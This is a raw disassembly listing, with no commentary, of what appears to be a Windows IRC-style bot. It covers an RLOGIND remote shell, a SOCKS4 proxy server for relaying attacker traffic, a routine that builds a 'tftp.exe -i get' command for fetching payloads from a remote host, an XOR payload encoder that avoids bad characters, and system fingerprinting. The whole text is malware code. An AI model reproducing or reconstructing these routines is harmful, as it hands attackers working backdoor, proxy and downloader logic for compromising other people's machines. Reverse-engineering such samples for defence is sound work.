push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401CA7
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
xor eax, eax
jmp loc_40F544
; ---------------------------------------------------------------------------
loc_40F464: ; CODE XREF: sub_40F3F5+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_40F1E4
push ebx
lea eax, [ebp+var_C]
push eax
call edi
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_40F4A5
call ds:dword_41F008
push eax
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401CA7
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_41F0C8
xor eax, eax
jmp loc_40F545
; ---------------------------------------------------------------------------
loc_40F4A5: ; CODE XREF: sub_40F3F5+86�j
mov eax, [esi+10h]
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
push 0FFFFFFFFh
mov [ebp+var_10], eax
push ebx
lea eax, [ebp+var_18]
push eax
push 3
call ds:dword_41F104
sub eax, ebx
jz short loc_40F4FF
dec eax
jz short loc_40F4F9
dec eax
jz short loc_40F4E5
call ds:dword_41F008
push eax
push offset aRlogindWaitfor ; "[RLOGIND]: WaitForMultipleObjects error"...
call sub_401CA7
pop ecx
pop ecx
jmp short loc_40F514
; ---------------------------------------------------------------------------
loc_40F4E5: ; CODE XREF: sub_40F3F5+D9�j
mov edi, ds:dword_41F0C8
push ebx
push dword ptr [esi+14h]
call edi
push ebx
push dword ptr [esi+10h]
call edi
jmp short loc_40F514
; ---------------------------------------------------------------------------
loc_40F4F9: ; CODE XREF: sub_40F3F5+D6�j
push ebx
push dword ptr [esi+10h]
jmp short loc_40F503
; ---------------------------------------------------------------------------
loc_40F4FF: ; CODE XREF: sub_40F3F5+D3�j
push ebx
push dword ptr [esi+14h]
loc_40F503: ; CODE XREF: sub_40F3F5+108�j
call ds:dword_41F0C8
push 1
push dword ptr [esi+8]
call ds:dword_41F0BC
loc_40F514: ; CODE XREF: sub_40F3F5+EE�j
; sub_40F3F5+102�j
push dword ptr [esi+10h]
mov edi, ds:dword_41F034
call edi
push dword ptr [esi+14h]
call edi
push dword ptr [esi+8]
call edi
push dword ptr [esi]
call edi
push dword ptr [esi+4]
call edi
push dword ptr [esi+0Ch]
call dword_4335AC
push esi
call sub_412FE4
xor eax, eax
inc eax
loc_40F544: ; CODE XREF: sub_40F3F5+6A�j
pop ecx
loc_40F545: ; CODE XREF: sub_40F3F5+AB�j
pop edi
pop esi
pop ebx
leave
retn
sub_40F3F5 endp
; =============== S U B R O U T I N E =======================================
sub_40F54A proc near ; CODE XREF: sub_40F576+A�p
; sub_40F779+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
lea edx, [eax+1]
loc_40F551: ; CODE XREF: sub_40F54A+C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F551
sub eax, edx
push esi
mov esi, eax
mov eax, [esp+4+arg_4]
lea ecx, [eax+1]
loc_40F564: ; CODE XREF: sub_40F54A+1F�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40F564
sub eax, ecx
lea eax, [esi+eax*2+0C1h]
pop esi
retn
sub_40F54A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F576 proc near ; CODE XREF: sub_40F790+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40F54A
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_40F593
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40F593: ; CODE XREF: sub_40F576+17�j
mov eax, [ebp+arg_8]
lea edx, [eax+1]
loc_40F599: ; CODE XREF: sub_40F576+28�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F599
sub eax, edx
push ebx
mov edx, eax
mov eax, [ebp+arg_C]
push esi
push edi
mov [ebp+arg_4], edx
lea esi, [eax+1]
loc_40F5B0: ; CODE XREF: sub_40F576+3F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F5B0
sub eax, esi
mov ebx, [ebp+arg_0]
lea ecx, [eax+edx+12h]
mov dword_42B3A4, ecx
push 0FFFFFFEDh
lea ecx, [eax+1]
mov dword_42B3C5, ecx
lea ecx, [eax+17h]
mov dword_42B3BD, ecx
pop ecx
sub ecx, eax
mov dword_42B3D3, ecx
push 1Dh
pop ecx
mov edi, ebx
mov esi, offset dword_42B340
rep movsd
mov esi, [ebp+arg_8]
mov ecx, edx
shr ecx, 2
lea edi, [ebx+74h]
rep movsd
mov ecx, edx
mov edx, [ebp+arg_4]
and ecx, 3
rep movsb
add edx, 74h
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+0Ch)
movsd
movsb
mov esi, [ebp+arg_C]
add edx, 5
lea edi, [edx+ebx]
mov ecx, eax
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
mov ebx, [ebp+arg_0]
and ecx, 3
rep movsb
add edx, eax
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+11h)
movsd
movsd
movsd
movsd
mov esi, [ebp+arg_C]
add edx, 10h
mov ecx, eax
lea edi, [edx+ebx]
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
push 0Eh
lea edi, [edx+eax]
add edi, [ebp+arg_0]
mov eax, [ebp+var_4]
pop ecx
mov esi, offset byte_42B3C9
rep movsd
pop edi
pop esi
pop ebx
leave
retn
sub_40F576 endp
; =============== S U B R O U T I N E =======================================
sub_40F66E proc near ; CODE XREF: sub_40F689+41�p
; sub_40F779+E�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_40F677
inc ecx
loc_40F677: ; CODE XREF: sub_40F66E+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_40F66E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F689 proc near ; CODE XREF: sub_40F790+56�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_C]
cmp bl, 0Ah
push esi
jz short loc_40F6A4
cmp bl, 0Dh
jz short loc_40F6A4
cmp bl, 5Ch
jz short loc_40F6A4
test bl, bl
jnz short loc_40F6A5
loc_40F6A4: ; CODE XREF: sub_40F689+B�j
; sub_40F689+10�j ...
inc ebx
loc_40F6A5: ; CODE XREF: sub_40F689+19�j
mov esi, 0FFh
cmp ebx, esi
jbe short loc_40F6C9
mov eax, ebx
shr eax, 8
cmp al, 0Ah
jz short loc_40F6C3
cmp al, 0Dh
jz short loc_40F6C3
cmp al, 5Ch
jz short loc_40F6C3
test al, al
jnz short loc_40F6C9
loc_40F6C3: ; CODE XREF: sub_40F689+2C�j
; sub_40F689+30�j ...
add ebx, 100h
loc_40F6C9: ; CODE XREF: sub_40F689+23�j
; sub_40F689+38�j
push ebx
call sub_40F66E
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+arg_C], eax
ja short loc_40F6DF
cmp eax, 0FFFFh
jbe short loc_40F6E6
loc_40F6DF: ; CODE XREF: sub_40F689+4D�j
xor eax, eax
jmp loc_40F775
; ---------------------------------------------------------------------------
loc_40F6E6: ; CODE XREF: sub_40F689+54�j
mov dl, byte_479E18
xor eax, eax
test ebx, ebx
jbe short loc_40F714
loc_40F6F2: ; CODE XREF: sub_40F689+89�j
mov ecx, [ebp+arg_8]
mov cl, [eax+ecx]
xor cl, dl
jz short loc_40F70B
cmp cl, 0Ah
jz short loc_40F70B
cmp cl, 0Dh
jz short loc_40F70B
cmp cl, 5Ch
jnz short loc_40F70F
loc_40F70B: ; CODE XREF: sub_40F689+71�j
; sub_40F689+76�j ...
inc dl
xor eax, eax
loc_40F70F: ; CODE XREF: sub_40F689+80�j
inc eax
cmp eax, ebx
jb short loc_40F6F2
loc_40F714: ; CODE XREF: sub_40F689+67�j
cmp ebx, esi
push edi
mov edi, [ebp+arg_0]
push 5
mov byte_479E18, dl
pop ecx
ja short loc_40F73C
mov esi, offset loc_42B328
mov byte_42B335, bl
mov byte_42B339, dl
rep movsd
push 15h
jmp short loc_40F754
; ---------------------------------------------------------------------------
loc_40F73C: ; CODE XREF: sub_40F689+9A�j
mov word_42B31E, bx
mov byte_42B323, dl
mov esi, offset loc_42B310
rep movsd
movsw
push 17h
loc_40F754: ; CODE XREF: sub_40F689+B1�j
pop eax
xor ecx, ecx
test ebx, ebx
movsb
pop edi
jbe short loc_40F772
mov esi, [ebp+arg_0]
add esi, eax
loc_40F762: ; CODE XREF: sub_40F689+E7�j
mov eax, [ebp+arg_8]
mov al, [ecx+eax]
xor al, dl
mov [esi+ecx], al
inc ecx
cmp ecx, ebx
jb short loc_40F762
loc_40F772: ; CODE XREF: sub_40F689+D2�j
mov eax, [ebp+arg_C]
loc_40F775: ; CODE XREF: sub_40F689+58�j
pop esi
pop ebx
pop ebp
retn
sub_40F689 endp
; =============== S U B R O U T I N E =======================================
sub_40F779 proc near ; CODE XREF: sub_40F790+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40F54A
push eax
call sub_40F66E
add esp, 0Ch
retn
sub_40F779 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F790 proc near ; CODE XREF: sub_411235+6D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_40F779
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_40F7B0
cmp eax, 0FFFFh
jbe short loc_40F7B4
loc_40F7B0: ; CODE XREF: sub_40F790+17�j
xor eax, eax
jmp short loc_40F7F9
; ---------------------------------------------------------------------------
loc_40F7B4: ; CODE XREF: sub_40F790+1E�j
push esi
push edi
push ebx
call sub_40F54A
add eax, 101h
push eax
call sub_41344D
add esp, 0Ch
push edi
push ebx
push edi
push ebx
mov esi, eax
call sub_40F54A
pop ecx
pop ecx
push eax
push esi
call sub_40F576
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F689
push esi
mov edi, eax
call sub_412FE4
add esp, 24h
mov eax, edi
pop esi
loc_40F7F9: ; CODE XREF: sub_40F790+22�j
pop edi
pop ebx
pop ebp
retn
sub_40F790 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F7FD proc near ; CODE XREF: sub_40F8FA+200�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
push esi
push edi
xor ebx, ebx
mov esi, 400h
loc_40F810: ; CODE XREF: sub_40F7FD+C0�j
; sub_40F7FD+F2�j
mov eax, [ebp+arg_4]
xor ecx, ecx
inc ecx
mov [ebp+var_100], eax
mov [ebp+var_104], ecx
xor eax, eax
loc_40F824: ; CODE XREF: sub_40F7FD+36�j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_100], edx
jz short loc_40F835
inc eax
cmp eax, ecx
jb short loc_40F824
loc_40F835: ; CODE XREF: sub_40F7FD+31�j
cmp eax, ecx
jnz short loc_40F849
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_40F849: ; CODE XREF: sub_40F7FD+3A�j
push ebx
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+var_504]
rep stosd
push ebx
lea eax, [ebp+var_104]
push eax
push ebx
call dword_433544
lea eax, [ebp+var_104]
push eax
push [ebp+arg_4]
call dword_4334F4
test eax, eax
jz short loc_40F8AB
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_433414
cmp eax, 0FFFFFFFFh
jz short loc_40F8F5
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_433534
cmp eax, 0FFFFFFFFh
jz short loc_40F8F5
loc_40F8AB: ; CODE XREF: sub_40F7FD+7E�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_4334F4
test eax, eax
jz loc_40F810
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_433414
cmp eax, 0FFFFFFFFh
jz short loc_40F8F5
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_433534
cmp eax, 0FFFFFFFFh
jnz loc_40F810
loc_40F8F5: ; CODE XREF: sub_40F7FD+95�j
; sub_40F7FD+AC�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40F7FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40F8FA proc near ; DATA XREF: sub_40FB2A+13F�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_4D4 = byte ptr -4D4h
var_4D3 = byte ptr -4D3h
var_4D2 = word ptr -4D2h
var_4D0 = dword ptr -4D0h
var_4CC = byte ptr -4CCh
var_CC = byte ptr -0CCh
var_48 = byte ptr -48h
var_30 = dword ptr -30h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 5D8h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 2Ch
pop ecx
mov esi, edx
lea edi, [ebp+74h+var_CC]
rep movsd
mov edi, [ebp+74h+var_30]
xor eax, eax
inc eax
mov [edx+0ACh], eax
mov esi, edi
mov [ebp+74h+var_5D8], eax
imul esi, 234h
mov ecx, dword_434344[esi]
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_5D8]
push eax
push ebx
mov [ebp+74h+arg_0], edi
mov [ebp+74h+var_C], 5
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_5D4], ecx
call dword_433544
test eax, eax
jnz short loc_40F96D
push dword_434344[esi]
jmp loc_40FB15
; ---------------------------------------------------------------------------
loc_40F96D: ; CODE XREF: sub_40F8FA+66�j
push ebx
push 408h
lea eax, [ebp+74h+var_4D4]
push eax
push dword_434344[esi]
call dword_433414
test eax, eax
jle loc_40FB0F
cmp [ebp+74h+var_4D4], 4
jnz loc_40FB0F
cmp [ebp+74h+var_4D3], 1
jnz loc_40FB0F
cmp [ebp+74h+var_48], bl
jz loc_40FA43
lea eax, [ebp+74h+var_48]
lea edi, [ebp+74h+var_4CC]
loc_40F9BA: ; CODE XREF: sub_40F8FA+DC�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_40F9DC
cmp cl, bl
jz short loc_40F9D8
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_40F9DC
inc edi
inc edi
inc eax
inc eax
cmp cl, bl
jnz short loc_40F9BA
loc_40F9D8: ; CODE XREF: sub_40F8FA+CA�j
xor eax, eax
jmp short loc_40F9E1
; ---------------------------------------------------------------------------
loc_40F9DC: ; CODE XREF: sub_40F8FA+C6�j
; sub_40F8FA+D4�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40F9E1: ; CODE XREF: sub_40F8FA+E0�j
cmp eax, ebx
jz short loc_40FA43
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_4CC]
push eax
push offset aSocks4Authenti ; "[SOCKS4]: Authentication failed. Remote"...
call sub_401CA7
add esp, 0Ch
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Dh
loc_40FA0A: ; CODE XREF: sub_40F8FA+1C0�j
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
lea eax, [ebp+74h+var_4D4]
push eax
push dword_434344[esi]
call dword_433534
loc_40FA2F: ; CODE XREF: sub_40F8FA+210�j
push dword_434344[esi]
call dword_4335AC
push [ebp+74h+arg_0]
jmp loc_40FB1C
; ---------------------------------------------------------------------------
loc_40FA43: ; CODE XREF: sub_40F8FA+B1�j
; sub_40F8FA+E9�j
xor eax, eax
lea edi, [ebp+74h+var_1C]
stosd
stosd
stosd
stosd
mov ax, [ebp+74h+var_4D2]
push 6
mov [ebp+74h+var_1A], ax
mov eax, [ebp+74h+var_4D0]
push 1
push 2
mov [ebp+74h+var_1C], 2
mov [ebp+74h+var_18], eax
call dword_4334A0
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jnz short loc_40FA88
call dword_433558
push eax
push offset aSocks4ErrorFai ; "[SOCKS4]: Error: Failed to open socket("...
jmp short loc_40FAA6
; ---------------------------------------------------------------------------
loc_40FA88: ; CODE XREF: sub_40F8FA+17E�j
push 10h
lea ecx, [ebp+74h+var_1C]
push ecx
push eax
call dword_433458
cmp eax, 0FFFFFFFFh
jnz short loc_40FABF
call dword_433558
push eax
push offset aSocks4ErrorF_0 ; "[SOCKS4]: Error: Failed to connect to t"...
loc_40FAA6: ; CODE XREF: sub_40F8FA+18C�j
call sub_401CA7
pop ecx
pop ecx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Bh
jmp loc_40FA0A
; ---------------------------------------------------------------------------
loc_40FABF: ; CODE XREF: sub_40F8FA+19E�j
xor eax, eax
push ebx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Ah
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
lea eax, [ebp+74h+var_4D4]
push eax
push dword_434344[esi]
call dword_433534
push dword_434344[esi]
push [ebp+74h+var_4]
call sub_40F7FD
pop ecx
pop ecx
push [ebp+74h+var_4]
call dword_4335AC
jmp loc_40FA2F
; ---------------------------------------------------------------------------
loc_40FB0F: ; CODE XREF: sub_40F8FA+8E�j
; sub_40F8FA+9B�j ...
push dword_434344[esi]
loc_40FB15: ; CODE XREF: sub_40F8FA+6E�j
call dword_4335AC
push edi
loc_40FB1C: ; CODE XREF: sub_40F8FA+144�j
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_40F8FA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40FB2A proc near ; DATA XREF: sub_4078FA+494C�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 2D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 2Ch
pop ecx
xor ebx, ebx
lea edi, [ebp+74h+var_D4]
rep movsd
push [ebp+74h+var_40]
inc ebx
mov [eax+0A8h], ebx
xor eax, eax
lea edi, [ebp+74h+var_14]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_4], 10h
mov [ebp+74h+var_14], 2
call dword_4335EC
push 6
push ebx
xor esi, esi
push 2
mov [ebp+74h+var_12], ax
mov [ebp+74h+var_10], esi
call dword_4334A0
mov edi, eax
mov eax, [ebp+74h+var_3C]
imul eax, 234h
mov dword_434344[eax], edi
push 10h
lea eax, [ebp+74h+var_14]
push eax
push edi
call dword_433578
test eax, eax
jnz loc_40FCBB
push 0Ah
push edi
call dword_4335C0
test eax, eax
jnz loc_40FCBB
push [ebp+74h+var_40]
push [ebp+74h+var_D4]
call sub_406C33
pop ecx
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+74h+var_30], esi
jnz short loc_40FBF8
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_4045DD
add esp, 14h
loc_40FBF8: ; CODE XREF: sub_40FB2A+B2�j
; sub_40FB2A+17A�j ...
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401C33
pop ecx
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_24]
push eax
push edi
call dword_433464
push [ebp+74h+var_3C]
mov ebx, eax
movzx eax, [ebp+74h+var_22]
push eax
push [ebp+74h+var_20]
mov [ebp+74h+var_28], esi
call dword_433520
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ClientCo ; "[SOCKS4]: Client connection from IP: %s"...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+74h+var_2D4]
push 12h
push eax
call sub_410EEA
mov ecx, [ebp+74h+var_3C]
mov [ebp+74h+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_43433C[eax], ecx
lea eax, [ebp+74h+arg_0]
push eax
push esi
lea eax, [ebp+74h+var_D4]
push eax
push offset sub_40F8FA
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+74h+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40FCB1
call ds:dword_41F008
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_0 ; "[SOCKS4]: Failed to start client thread"...
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40FBF8
; ---------------------------------------------------------------------------
loc_40FCA9: ; CODE XREF: sub_40FB2A+18A�j
push 5
call ds:dword_41F000
loc_40FCB1: ; CODE XREF: sub_40FB2A+15D�j
cmp [ebp+74h+var_28], esi
jz short loc_40FCA9
jmp loc_40FBF8
; ---------------------------------------------------------------------------
loc_40FCBB: ; CODE XREF: sub_40FB2A+77�j
; sub_40FB2A+88�j
push edi
call dword_4335AC
push [ebp+74h+var_40]
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_1 ; "[SOCKS4]: Failed to start server on Por"...
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+74h+var_30], esi
jnz short loc_40FCF8
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_4045DD
add esp, 14h
loc_40FCF8: ; CODE XREF: sub_40FB2A+1B2�j
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401C33
push [ebp+74h+var_3C]
call sub_4111AE
pop ecx
pop ecx
push esi
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_40FB2A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40FD16 proc near ; CODE XREF: sub_401000+74�p
; sub_4078FA+42B4�p ...
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_41F004
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
mov esi, offset dword_479E1C
push esi
call sub_412E0D
add esp, 18h
pop edi
mov eax, esi
pop esi
retn
sub_40FD16 endp
; =============== S U B R O U T I N E =======================================
sub_40FD69 proc near ; CODE XREF: sub_40FE1F+240�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_40FD71: ; CODE XREF: sub_40FD69+2F�j
; sub_40FD69+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call ds:dword_41F000
rdtsc
push 0
sub eax, esi
push edi
sbb edx, ebx
push edx
push eax
call sub_414600
mov esi, edx
test esi, esi
mov ebx, eax
ja short loc_40FD71
jb short loc_40FDA0
cmp ebx, edi
ja short loc_40FD71
loc_40FDA0: ; CODE XREF: sub_40FD69+31�j
push 0
push 64h
push esi
push ebx
call sub_414580
mov ecx, edx
push 64h
xor edx, edx
test ecx, ecx
mov edi, eax
pop eax
ja short loc_40FE13
jb short loc_40FDBF
cmp edi, 50h
jnb short loc_40FDC4
loc_40FDBF: ; CODE XREF: sub_40FD69+4F�j
push 4Bh
pop eax
xor edx, edx
loc_40FDC4: ; CODE XREF: sub_40FD69+54�j
test ecx, ecx
ja short loc_40FE13
jb short loc_40FDCF
cmp edi, 47h
jnb short loc_40FDD4
loc_40FDCF: ; CODE XREF: sub_40FD69+5F�j
push 42h
pop eax
xor edx, edx
loc_40FDD4: ; CODE XREF: sub_40FD69+64�j
test ecx, ecx
ja short loc_40FE13
jb short loc_40FDDF
cmp edi, 37h
jnb short loc_40FDE4
loc_40FDDF: ; CODE XREF: sub_40FD69+6F�j
push 32h
pop eax
xor edx, edx
loc_40FDE4: ; CODE XREF: sub_40FD69+74�j
test ecx, ecx
ja short loc_40FE13
jb short loc_40FDEF
cmp edi, 26h
jnb short loc_40FDF4
loc_40FDEF: ; CODE XREF: sub_40FD69+7F�j
push 21h
pop eax
xor edx, edx
loc_40FDF4: ; CODE XREF: sub_40FD69+84�j
test ecx, ecx
ja short loc_40FE13
jb short loc_40FDFF
cmp edi, 1Eh
jnb short loc_40FE04
loc_40FDFF: ; CODE XREF: sub_40FD69+8F�j
push 19h
pop eax
xor edx, edx
loc_40FE04: ; CODE XREF: sub_40FD69+94�j
test ecx, ecx
ja short loc_40FE13
jb short loc_40FE0F
cmp edi, 0Ah
jnb short loc_40FE13
loc_40FE0F: ; CODE XREF: sub_40FD69+9F�j
xor eax, eax
xor edx, edx
loc_40FE13: ; CODE XREF: sub_40FD69+4D�j
; sub_40FD69+5D�j ...
sub eax, edi
sbb edx, ecx
add eax, ebx
pop edi
adc edx, esi
pop esi
pop ebx
retn
sub_40FD69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_40FE1F proc near ; CODE XREF: sub_4078FA+44AB�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 7E8h
push ebx
push esi
push edi
lea eax, [ebp+70h+var_CC]
push eax
mov [ebp+70h+var_4], 41FA76h
mov [ebp+70h+var_CC], 94h
call ds:dword_41F0F8
xor ebx, ebx
cmp [ebp+70h+var_C8], 4
jnz short loc_40FE90
cmp [ebp+70h+var_C4], ebx
jnz short loc_40FE72
cmp [ebp+70h+var_BC], 1
jnz short loc_40FE5F
mov [ebp+70h+var_4], offset a95 ; "95"
loc_40FE5F: ; CODE XREF: sub_40FE1F+37�j
cmp [ebp+70h+var_BC], 2
jnz loc_40FEF6
mov [ebp+70h+var_4], offset aNt ; "NT"
jmp short loc_40FECD
; ---------------------------------------------------------------------------
loc_40FE72: ; CODE XREF: sub_40FE1F+31�j
cmp [ebp+70h+var_C4], 0Ah
jnz short loc_40FE81
mov [ebp+70h+var_4], offset a98 ; "98"
jmp short loc_40FEC7
; ---------------------------------------------------------------------------
loc_40FE81: ; CODE XREF: sub_40FE1F+57�j
cmp [ebp+70h+var_C4], 5Ah
jnz short loc_40FEC0
mov [ebp+70h+var_4], offset aMe_0 ; "ME"
jmp short loc_40FEC7
; ---------------------------------------------------------------------------
loc_40FE90: ; CODE XREF: sub_40FE1F+2C�j
cmp [ebp+70h+var_C8], 5
jnz short loc_40FEC0
cmp [ebp+70h+var_C4], ebx
jnz short loc_40FEA4
mov [ebp+70h+var_4], offset a2k ; "2K"
jmp short loc_40FEC7
; ---------------------------------------------------------------------------
loc_40FEA4: ; CODE XREF: sub_40FE1F+7A�j
cmp [ebp+70h+var_C4], 1
jnz short loc_40FEB3
mov [ebp+70h+var_4], offset aXp_0 ; "XP"
jmp short loc_40FEC7
; ---------------------------------------------------------------------------
loc_40FEB3: ; CODE XREF: sub_40FE1F+89�j
cmp [ebp+70h+var_C4], 2
mov [ebp+70h+var_4], offset a2003 ; "2003"
jz short loc_40FEC7
loc_40FEC0: ; CODE XREF: sub_40FE1F+66�j
; sub_40FE1F+75�j
mov [ebp+70h+var_4], offset a??? ; "???"
loc_40FEC7: ; CODE XREF: sub_40FE1F+60�j
; sub_40FE1F+6F�j ...
cmp [ebp+70h+var_BC], 2
jnz short loc_40FEF6
loc_40FECD: ; CODE XREF: sub_40FE1F+51�j
cmp [ebp+70h+var_B8], bl
jz short loc_40FEF6
